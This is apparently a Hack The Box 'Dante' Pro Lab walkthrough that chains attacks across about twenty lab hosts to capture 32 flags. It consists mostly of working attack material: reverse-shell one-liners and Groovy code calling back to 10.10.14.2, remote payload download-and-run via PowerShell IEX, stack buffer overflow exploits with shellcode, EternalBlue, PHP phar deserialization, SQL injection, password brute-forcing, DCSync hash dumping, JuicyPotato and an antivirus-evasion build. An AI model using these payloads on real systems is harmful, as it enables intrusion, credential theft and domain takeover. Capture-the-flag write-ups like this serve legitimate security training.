Hack The Box · Pro Lab
Dante

Dante

MediumMixedNetworkPrivilege EscalationLateral Movement

Difficulty: Intermediate | OS: Mixed (Linux + Windows)

1. Reconnaissance — Network Discovery

Why: Map the external subnet to identify live hosts before targeted scanning.

nmap -sn -T4 10.10.110.0/24 -oN active-hosts

Key finding: Two active hosts — 10.10.110.2 (lab controller, ignore) and 10.10.110.100 (DANTE-WEB-NIX01).

nmap -T4 -sC -sV -p- --min-rate=1000 10.10.110.100

Open ports: 21 (FTP — anonymous login enabled), 22 (SSH), 65000 (HTTP — Apache/WordPress)

2. FTP Enumeration — DANTE-WEB-NIX01

Why: Anonymous FTP was flagged by Nmap. Unauthenticated access may expose sensitive files.

ftp 10.10.110.100
# anonymous / anonymous
cd Transfer/Incoming
get todo.txt

Key finding from todo.txt: LFI vulnerability exists on a site; user James has a weak password.

Note: robots.txt on port 65000 reveals /wordpress path and contains FLAG 1.

3. WordPress Enumeration & Foothold — DANTE-WEB-NIX01

Why: WordPress admin access allows theme file editing to achieve RCE.

wpscan --url http://10.10.110.100:65000/wordpress --enumerate vp
wpscan --url http://10.10.110.100:65000/wordpress --enumerate u
# Users found: admin, james

Build a custom wordlist from the site's content:

cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks > words.txt
# Employee names from "Meet The Team" page:
cat > names.txt << EOF
james
kevin
kalthazar
aj
nathan
EOF
wpscan --url http://10.10.110.100:65000/wordpress --usernames names.txt --passwords words.txt

Credentials found: james : Toyota

Navigate to /wordpress/wp-admin/ → Appearance → Theme Editor → Twenty Nineteen → 404.php. Replace contents:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1234 0>&1'"); ?>

nc -lvnp 1234
# Trigger: curl http://10.10.110.100:65000/wordpress/wp-content/themes/twentynineteen/404.php

Shell received as www-data on DANTE-WEB-NIX01.

4. Privilege Escalation — DANTE-WEB-NIX01 (www-data → james → root)

Why: WordPress credentials reused on OS account. SUID find binary allows root escalation.

su james  # password: Toyota
python3 -c 'import pty;pty.spawn("/bin/bash")'
# FLAG 2: james home directory

Check bash history for credential reuse:

cat /home/james/.bash_history
# Reveals MySQL credentials for balthazar: balthazar : TheJoker12345!

Find SUID binaries:

find / -perm -4000 2>/dev/null
# find binary is SUID root
find . -exec /bin/bash -p \; -quit
# FLAG 3: /root

Add SSH key persistence and set up pivot:

echo 'ssh-ed25519 <your_key>' >> /root/.ssh/authorized_keys
ssh -i id_rsa -D 1080 root@10.10.110.100
# Edit /etc/proxychains.conf: socks5 127.0.0.1 1080

5. LFI & SMB — DANTE-NIX02 (172.16.1.10)

Why: Proxychains pivot exposes internal subnet. NIX02 runs Apache with LFI and Samba with null sessions.

proxychains nmap 172.16.1.10 -sT -sV -Pn -T5
# Open: 22 (SSH), 80 (HTTP), 139/445 (Samba)

Test LFI:

# http://172.16.1.10/nav.php?page=../../../../../../etc/passwd
# Users found: frank, margaret

SMB null session enumeration:

proxychains smbclient -L \\172.16.1.10
proxychains smbclient \\172.16.1.10\SlackMigration
get admintasks.txt
# Reveals: WordPress installed at web root /var/www/html/

Extract wp-config.php via PHP filter wrapper:

# http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php
curl "172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php" | base64 -d > wp-config.php
# DB_USER: margaret | DB_PASSWORD: STARS5678FORTUNE401

proxychains ssh margaret@172.16.1.10
# Restricted shell — vim is allowed

Escape restricted bash with vim:

vim
:set shell=/bin/bash
:shell
# FLAG 4: margaret home directory

6. Lateral Movement & Privesc — DANTE-NIX02 (margaret → frank → root)

Why: Slack config files contain plaintext credentials for frank. A cron-executed Python script is vulnerable to module hijacking.

ls /home/margaret/.config/Slack/
# Enumerate exported Slack data — channel logs
# frank's credentials found in secure channel chat logs
su frank

Check running processes:

wget http://10.10.14.2/pspy && chmod +x pspy && ./pspy
# root executes /home/frank/apache_restart.py every minute

Python module hijack (urllib):

# /home/frank/urllib.py
import os
os.system("cp /bin/sh /tmp/sh;chmod u+s /tmp/sh")

# Wait 1 minute
/tmp/sh -p
# FLAG 5: /root

7. Webmin RCE — DANTE-NIX03 (172.16.1.17)

Why: SMB share contains a packet capture. Wireshark reveals Webmin credentials. Webmin 1.900 is vulnerable to authenticated RCE.

proxychains nmap 172.16.1.17 -sT -sV -Pn -T5
# Open: 80 (HTTP), 139/445 (Samba), 10000 (Webmin HTTP)
proxychains smbclient \\172.16.1.17\forensics
get monitor
wireshark monitor
# Follow HTTP stream → admin : Password6543 (capital P, second POST request)

Webmin 1.900 RCE (below 1.930 is vulnerable):

nc -lvnp 1234
proxychains python webmin_exploit.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543
python -c 'import pty;pty.spawn("/bin/bash")'
# FLAG 6: /root

8. Online Discussion Forum RCE — DANTE-WS01 (172.16.1.13)

Why: XAMPP host running Online Discussion Forum 1.0 which allows unauthenticated PHP file upload during user registration.

proxychains nmap 172.16.1.13 -sT -sV -Pn -T5
# Open: 80 (HTTP), 443 (HTTPS)
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.13/ -w common.txt
# Found: /discuss

Register a new user, upload shell.php as the profile image:

<?php echo exec($_GET["cmd"]);?>

Webshell available at /discuss/ups/shell.php. Download nc.exe and get reverse shell:

python3 -m http.server 80
# http://172.16.1.13/discuss/ups/shell.php?cmd=powershell wget http://10.10.14.2/nc.exe -o nc.exe
nc -lvnp 1234
# http://172.16.1.13/discuss/ups/shell.php?cmd=nc.exe -e cmd.exe 10.10.14.2 1234
# Shell as gerald on DANTE-WS01
# FLAG 7: gerald desktop

9. Druva inSync LPE — DANTE-WS01 (gerald → SYSTEM)

Why: Non-default software Druva inSync 6.6.3 is installed, which is vulnerable to a local privilege escalation that allows adding users to administrators group and spawning a SYSTEM shell.

# Check: C:\Program Files\Druva\inSync\licence.txt — version 6.6.3
powershell wget 10.10.14.2/druva.py -o druva.py
# Step 1: Add gerald to administrators
c:\python27\python.exe druva.py "net localgroup administrators gerald /add"
# Step 2: Spawn SYSTEM shell (bypass UAC)
powershell wget 10.10.14.2/nc.exe -o C:\xampp\htdocs\discuss\ups\nc.exe
c:\python27\python.exe druva.py "windows\system32\cmd.exe /C C:\xampp\htdocs\discuss\ups\nc.exe 10.10.14.2 4444 -e cmd.exe"
# Shell as nt authority\system
# FLAG 8: Administrator desktop

10. SQL Injection — DANTE-NIX04 (172.16.1.12)

Why: Responsive Blog 1.0 on NIX04 is vulnerable to SQL injection. sqlmap extracts the flag directly and cracks admin credentials for SSH access.

proxychains nmap 172.16.1.12 -sT -sV -Pn -T5
# Open: 21 (FTP), 80 (HTTP), 443 (HTTPS), 3306 (MySQL)
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.12 -w common.txt
# Found: /blog — Responsive Blog
# Validate SQLi: http://172.16.1.12/blog/category.php?id=2'  → SQL error
proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 --dbs --batch
proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D flag --dump
# FLAG 9: flag table
proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D blog_admin_db -T membership_users --dump

Crack MD5 hashes:

# Hashes: 21232f297a57a5a743894a0e4a801fc3 / 442179ad1de9c25593cabf625c0badb7 / d6501933a2e0ea1f497b87473051417f
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
# Cracked: admin, ben:Welcometomyblog
proxychains ssh ben@172.16.1.12
# FLAG 10: ben home directory

11. Privilege Escalation — DANTE-NIX04 (ben → julian → root)

Why: sudo entry allows running /bin/bash as any user except root. A known sudo 1.8.27 bypass (CVE-2019-14287) allows root via negative UID.

sudo -l
# (ALL, !root) /bin/bash
sudo -u julian /bin/bash
# LinPEAS: sudo version 1.8.27 — CVE-2019-14287
sudo -u#-1 /bin/bash
# FLAG 11: /root
# Dump julian shadow hash and crack
cat /etc/shadow | grep julian
john hash --wordlist=rockyou.txt

12. Online Marriage Registration RCE — DANTE-WS03 (172.16.1.102)

Why: Windows host running Online Marriage Registration System with a known authenticated RCE vulnerability.

proxychains nmap 172.16.1.102 -sT -Pn -T5
# Open: 80, 135, 139, 443, 445, 3389, 5357
# Register new user, run exploit
chmod +x exploit.sh
proxychains ./exploit.sh -u http://172.16.1.102/ -m 1231231231 -p test -c "whoami"
python3 -m http.server 80
proxychains ./exploit.sh -u http://172.16.1.102/ -m 1231231231 -p test -c "powershell wget 10.10.14.2/nc.exe -o nc.exe"
nc -lvnp 1234
proxychains ./exploit.sh -u http://172.16.1.102/ -m 1231231231 -p test -c "nc.exe -e cmd.exe 10.10.14.2 1234"
# Shell as blake on DANTE-WS03
# FLAG 12: blake desktop

13. Buffer Overflow (32-bit) — DANTE-WS03 (blake → SYSTEM)

Why: Custom service SERVER.EXE running on port 4444 has a stack-based BOF due to unsafe strcpy_s with a 1024-byte destination buffer and 2048-byte user input.

plink.exe -R 4444:127.0.0.1:4444 -l root -P 22 -pw toor 10.10.14.2
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=3333 connectaddress=127.0.0.1 connectport=4444 protocol=tcp
# Ghidra analysis confirms BOF. Offset: 1028. JMP ESP: 0x10476d73
# Bad chars: \x00, \x0a, \x0d
msfvenom -p windows/shell_reverse_tcp LHOST=<tun0_ip> LPORT=9999 -b "\x00\x0a\x0d" -f python

Final exploit:

payload = "A" * 1028 + "\x73\x6d\x47\x10" + "\x90" * 20 + buf

nc -lvnp 9999
python bof.py 127.0.0.1 4444
# Shell as nt authority\system on DANTE-WS03
# FLAG 13: Administrator desktop

14. EternalBlue (MS17-010) — DANTE-DC01 (172.16.1.20)

Why: Windows Server 2012 R2 DC running SMB, confirmed vulnerable to MS17-010. Unauthenticated RCE as SYSTEM.

proxychains nmap -sT -sV -Pn -T5 172.16.1.20
# Windows Server 2012 R2 — Kerberos/LDAP/SMB confirm DC
proxychains msfconsole
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 172.16.1.20
check  # vulnerable
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
run
# nt authority\system on DANTE-DC01

Post-exploitation:

# Excel spreadsheet on desktop — unhide column B for passwords
# net user mrb3n — flag in Comment field
# FLAG 14: mrb3n user Comment property
# FLAG 15: Administrator desktop

15. PHP Phar Deserialization — DANTE-NIX05 (172.16.1.37)

Why: Web app exposes PHP backup files revealing a Store class with a vulnerable __destruct() method. The phar:// wrapper triggers deserialization on file delete, leading to arbitrary file write and RCE.

proxychains nmap -sT -Pn -sV -T5 172.16.1.37
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.37/ -w /usr/share/wordlists/dirb/common.txt -x php.bak
proxychains curl http://172.16.1.37/feedback.php.bak -o feedback.php.bak
proxychains curl http://172.16.1.37/save.php.bak -o save.php.bak
# save.php.bak: Store class __destruct() → file_put_contents($filename, $contents)

Create malicious phar archive:

<?php
class Store {}
$phar = new \Phar("shell.phar");
$phar->startBuffering();
$phar->addFromString("test.txt", "test");
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$payload = new Store;
$payload->filename = "/var/www/html/uploads/test.php";
$payload->contents = '<?php echo exec($_GET["cmd"]);?>';
$phar->setMetadata($payload);
$phar->stopBuffering();
?>

php test.php
# Upload shell.phar (rename to .png in Burp) → delete via phar:// wrapper → creates test.php
# RCE at /uploads/test.php?cmd=id — running as pericles
# Copy SSH key to /home/pericles/.ssh/authorized_keys
proxychains ssh pericles@172.16.1.37
# FLAG 16: pericles home directory

16. Systemd Timer Abuse — DANTE-NIX05 (pericles → root)

Why: A systemd timer runs /usr/bin/tmp_delete.sh as root every minute and pericles has write access.

proxychains scp LinEnum.sh pericles@172.16.1.37:/tmp/linenum.sh
bash /tmp/linenum.sh
# Non-default timer: tmp_delete.service — runs every minute as root
# pericles has write access to /usr/bin/tmp_delete.sh
echo 'cp /bin/sh /home/pericles/sh && chmod u+s /home/pericles/sh' > /usr/bin/tmp_delete.sh
# Wait 1 minute
/home/pericles/sh -p
# FLAG 17: /root

17. elearning RCE — DANTE-WS04 (172.16.1.45)

Why: XAMPP host running an elearning CMS with default admin credentials. Admin panel allows PHP file upload as student profile image. Windows Defender requires AV bypass.

proxychains nmap -sT -Pn -sV -T5 172.16.1.45
gobuster dir -p socks5://127.0.0.1:1080 --url http://172.16.1.35/ -w /usr/share/wordlist/dirb/big.txt
# Found: /elearning — default admin credentials
# Students → Add Student → upload shell.php
# RCE at /elearning/admin/uploads/shell.php

AV bypass with prometheus.cpp:

i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
# Shell received as leroy on DANTE-WS04
# FLAG 18: leroy home directory

18. PSReadLine History — DANTE-WS04 (leroy → Administrator)

Why: PowerShell v5+ logs command history by default, including commands with hardcoded credentials.

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Reveals: administrator : KingOfTheMountain
proxychains rdesktop -u administrator -p KingOfTheMountain 172.16.1.45
# FLAG 19: Administrator desktop

19. FTP Brute Force & IObit Unquoted Service Path — DANTE-WS02 (172.16.1.101)

Why: FTP service lacks lockout policy. A hint reveals dharding's password was changed to a different number. IObit IObitUnSvr runs as SYSTEM with an unquoted binary path and dharding has ChangeConfig rights.

proxychains nmap -sT -Pn -sV -T5 172.16.1.101
use auxiliary/scanner/ftp/ftp_login
set PASS_FILE passwords.txt && set USER_FILE users.txt
set RHOSTS 172.16.1.101 && run
# Found: dharding : WestminsterOrange5
# Note on FTP: password has different number (not 5)
for i in {0..10};do echo "WestminsterOrange$i" >> words.txt;done
proxychains cme winrm 172.16.1.101 -u dharding -p words.txt
# Found: dharding : WestminsterOrange10
proxychains evil-winrm -i 172.16.1.101 -u dharding -p WestminsterOrange10
# FLAG 20: dharding desktop
upload nc.exe
sc.exe config IObitUnSvr binPath="cmd.exe /c C:/Users/dharding/Documents/nc.exe -e cmd.exe 10.10.14.2 3333"
sc.exe stop IObitUnSvr && sc.exe start IObitUnSvr
# nt authority\system — grab flag within 30 seconds before SCM kills service
# FLAG 21: Administrator desktop

20. FTP Flag & Subnet Discovery — DANTE-NIX01 (172.16.1.5)

Why: Internal host with anonymous FTP access. Ping sweep from DC01 reveals the 172.16.2.0/24 subnet.

ftp 172.16.1.5
# anonymous : anonymous
passive
get flag.txt
# FLAG 22
# From DANTE-DC01 meterpreter session:
(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"
# New host: 172.16.2.5

21. ASREPRoasting & DCSync — DANTE-DC02 (172.16.2.5)

Why: Second DC on isolated subnet. jbercov has pre-authentication disabled allowing ASREPRoasting. BloodHound reveals DCSync rights enabling full domain compromise.

# Forward ports through meterpreter session on DC01
meterpreter > portfwd add -L 127.0.0.1 -l 53 -p 53 -r 172.16.2.5
meterpreter > portfwd add -L 127.0.0.1 -l 88 -p 88 -r 172.16.2.5
./kerbrute_linux_amd64 userenum -d dante --dc 127.0.0.1 users.txt
# Valid user: jbercov
GetNPUsers.py dante/jbercov -no-pass -dc-ip 127.0.0.1
john tgt-hash --wordlist=rockyou.txt
# jbercov : myspace7
meterpreter > portfwd add -L 127.0.0.1 -l 5985 -p 5985 -r 172.16.2.5
evil-winrm -i 127.0.0.1 -u jbercov -p myspace7
# FLAG 23: jbercov desktop

BloodHound → jbercov has GetChangesAll on DANTE.ADMIN → DCSync:

upload SharpHound.ps1
import-module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
download 20200811054926_BloodHound.zip
# BloodHound: jbercov → GetChangesAll → DANTE.ADMIN domain
meterpreter > portfwd add -L 127.0.0.1 -l 445 -p 445 -r 172.16.2.5
secretsdump.py dante/jbercov@127.0.0.1 -just-dc-user Administrator
use exploit/windows/smb/psexec
set rhosts 127.0.0.1
set smbuser administrator
set smbpass <NTLM_HASH>
set payload windows/meterpreter/reverse_tcp
run
# nt authority\system on DANTE-ADMIN-DC02
# FLAG 24: Administrator desktop

22. Jenkins Groovy RCE & disk Group — DANTE-NIX07 (172.16.1.19)

Why: Jenkins admin credentials found on DANTE-ADMIN-DC02. Groovy script console gives RCE as jenkins. ian user is in the disk group providing raw block device access.

# Jenkins.bat on DC02 → Admin_129834765 : SamsungOctober102030
proxychains nmap -Pn -sT -sV -T5 172.16.1.19
# Port 8080: Jenkins — login with above creds
# FLAG 25: FLAG_HERE job description
# Manage Jenkins → Script Console

String host="10.10.14.2";
int port=8888;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}};
p.destroy();s.close();

# Shell as jenkins on DANTE-NIX07
# pspy: root runs MySQL as ian — password visible in process list
su ian  # ian is in disk group
cat /proc/self/mounts | grep 'sda'
# Root FS on /dev/sda5
debugfs /dev/sda5
# FLAG 26: /root via debugfs

23. SSH Brute Force & 64-bit BOF — DANTE-ADMIN-NIX05 (172.16.2.101)

Why: Host discovered via ping sweep from DC02. SSH brute with known creds. Custom readfile SUID binary has a 64-bit stack overflow (NX disabled, ASLR=0).

meterpreter > portfwd add -L 127.0.0.1 -l 7778 -p 22 -r 172.16.2.101
hydra -L users.txt -P passwords.txt ssh://127.0.0.1:7778
# julian : manchesterunited
ssh -p 7778 julian@127.0.0.1
# FLAG 27: julian desktop
find / -perms -4000 2>/dev/null
# /usr/sbin/readfile — SUID root, strcpy() vulnerability, offset 88

Exploit via shellcode in environment variable:

export SHELLCODE=`python2 -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`
gcc getenv.c -o getenv && chmod +x getenv
./getenv SHELLCODE /usr/sbin/readfile
# Get SHELLCODE address, e.g. 0x7fffffffe352
/usr/sbin/readfile $(python2 -c 'print "A"*88+"\x52\xe3\xff\xff\xff\x7f"')
# Root shell on DANTE-ADMIN-NIX05
# FLAG 28: /root

24. SSH Reuse & sudo — DANTE-ADMIN-NIX06 (172.16.2.6)

Why: julian's credentials reuse on NIX06. plongbottom password from earlier creds dump. plongbottom is in sudo group.

# Ping sweep from DANTE-ADMIN-NIX05
for i in {1..255};do (ping -c 1 172.16.2.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done
# New host: 172.16.2.6
ssh julian@172.16.2.6
# FLAG 29: julian desktop
# SQL file on desktop: Sophie SQL password = TerrorInflictPurpleDirt996655
su plongbottom  # password: PowerfixSaturdayClub777
sudo su
# FLAG 30: /root

25. MSSQL xp_cmdshell & JuicyPotato — DANTE-SQL01 (172.16.1.5)

Why: sophie has sysadmin rights on MSSQL. xp_cmdshell enables OS command execution. A PowerShell backup script exposes plaintext credentials. SeAssignPrimaryToken privilege allows JuicyPotato SYSTEM escalation.

proxychains mssqlclient.py sophie@172.16.1.5
# Password: TerrorInflictPurpleDirt996655
SELECT IS_SRVROLEMEMBER ('sysadmin');  -- 1
EXEC sp_configure 'Show Advanced Options', 1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
xp_cmdshell "whoami"  -- nt service\mssql$sqlexpress

Get reverse shell:

python3 -m http.server 80 && nc -lvnp 4444
xp_cmdshell "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.2/Invoke-PowerShellTcp.ps1');\""
# Shell as nt service\mssql$sqlexpress on DANTE-SQL01
# FLAG 31: C:\users directory

Privilege escalation via JuicyPotato:

# db_backup.ps1 reveals: $password = 'Alltheleavesarebrown1'
proxychains evil-winrm -i 172.16.1.5 -u sophie -p Alltheleavesarebrown1
# whoami /priv: SeAssignPrimaryToken present — Windows Server 2016
upload nc.exe
.\JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -a "/c c:\users\sophie\documents\nc.exe -e cmd.exe 10.10.14.2 8888" -l 1337 -c "{8BC3F05E-D86B-11D0-A075-00C04FB68820}"
# nt authority\system on DANTE-SQL01
# FLAG 32: Administrator desktop

Attack Chain Summary

nmap sweep 10.10.110.0/24 → DANTE-WEB-NIX01 (10.10.110.100)
        ↓
FTP anon → todo.txt | robots.txt → FLAG 1
WordPress wpscan → james:Toyota → wp-admin theme editor RCE → www-data
su james → FLAG 2 | find SUID root → FLAG 3 | proxychains pivot
        ↓
DANTE-NIX02 (172.16.1.10): LFI → /etc/passwd | SMB null → wp-config.php
margaret:STARS5678FORTUNE401 → SSH rbash → vim escape → FLAG 4
Slack logs → frank creds | Python urllib hijack → root → FLAG 5
        ↓
DANTE-NIX03 (172.16.1.17): SMB pcap → Wireshark admin:Password6543
Webmin 1.900 RCE → root → FLAG 6
        ↓
DANTE-WS01 (172.16.1.13): Online Discussion Forum RCE → gerald → FLAG 7
Druva inSync 6.6.3 LPE → SYSTEM → FLAG 8
        ↓
DANTE-NIX04 (172.16.1.12): SQLi → flag (FLAG 9) + MD5 hashes
john → ben:Welcometomyblog → SSH → FLAG 10
sudo -u#-1 bypass (CVE-2019-14287) → root → FLAG 11
        ↓
DANTE-WS03 (172.16.1.102): Marriage Reg RCE → blake → FLAG 12
SERVER.EXE BOF (offset 1028, JMP ESP 0x10476d73) → SYSTEM → FLAG 13
        ↓
DANTE-DC01 (172.16.1.20): MS17-010 EternalBlue → SYSTEM
Excel creds + mrb3n flag → FLAGS 14-15
        ↓
DANTE-NIX05 (172.16.1.37): PHP Phar deserialization → pericles → FLAG 16
systemd timer write → root → FLAG 17
        ↓
DANTE-WS04 (172.16.1.45): elearning RCE (AV bypass) → leroy → FLAG 18
PSReadLine history → admin:KingOfTheMountain → RDP → FLAG 19
        ↓
DANTE-WS02 (172.16.1.101): FTP brute → dharding:WestminsterOrange10
IObit unquoted service path → SYSTEM → FLAGS 20-21
        ↓
DANTE-NIX01 (172.16.1.5): FTP anon → FLAG 22
        ↓
DANTE-DC02 (172.16.2.5): ASREPRoast jbercov:myspace7
BloodHound DCSync → secretsdump → Admin NTLM → PSExec PTH → SYSTEM → FLAGS 23-24
        ↓
DANTE-NIX07 (172.16.1.19): Jenkins Groovy RCE → ian disk group → debugfs → FLAG 26
        ↓
DANTE-ADMIN-NIX05 (172.16.2.101): SSH brute julian:manchesterunited → FLAG 27
readfile SUID 64-bit BOF (shellcode in env) → root → FLAG 28
        ↓
DANTE-ADMIN-NIX06 (172.16.2.6): SSH reuse → plongbottom:PowerfixSaturdayClub777
sudo su → root → FLAGS 29-30 | Sophie SQL creds found
        ↓
DANTE-SQL01 (172.16.1.5): MSSQL sysadmin → xp_cmdshell → shell
db_backup.ps1 → sophie:Alltheleavesarebrown1 → WinRM
SeAssignPrimaryToken → JuicyPotato → SYSTEM → FLAGS 31-32

0xNRG

Writeup restricted

This machine is currently active. The full writeup will be published once the box retires, in accordance with HTB's NDA policy.

Status — Active